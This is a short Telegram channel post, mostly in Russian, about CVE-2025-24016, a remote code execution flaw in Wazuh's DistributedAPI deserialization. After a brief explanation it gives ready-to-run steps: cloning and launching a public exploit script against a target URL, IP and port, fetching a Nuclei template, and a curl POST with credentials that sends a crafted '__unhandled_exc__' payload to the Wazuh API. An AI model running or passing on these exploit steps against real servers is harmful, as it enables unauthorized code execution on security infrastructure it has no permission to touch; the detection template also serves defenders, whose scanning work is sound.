https://t.me/bizonebb
А то они там расслабились что-то, а вы у меня активные, так что не сомневаюсь в вас)
Le dernier contenu partagé par Похек sur Telegram
DistributedAPI
в формате JSON и последующей десериализации через функцию as_wazuh_object
(расположенную в framework/wazuh/core/cluster/common.py
). Если злоумышленник внедрит небезопасный словарь в запрос или ответ DAPI, это может привести к генерации необработанного исключения (__unhandled_exc__
) и, как следствие, выполнению произвольного Python-кода, что позволяет дистанционно выполнить код на сервере. git clone https://github.com/0xjessie21/CVE-2025-24016.git
cd CVE-2025-24016/
python3 -m venv venv; source venv/bin/activate
pip install -r requirements.txt
python3 CVE-2025-24016.py -u <url> -i <IP> -p <PORT>
wget https://raw.githubusercontent.com/huseyinstif/CVE-2025-24016-Nuclei-Template/refs/heads/main/CVE-2025-24016.yaml
curl -X POST -k -u "wazuh-wui:MyS3cr37P450r.*-" -H "Content-Type: application/json" --data '{"unhandled_exc":{"class": "exit", "args": []}}' https://<worker-server>:55000/security/user/authenticate/run_as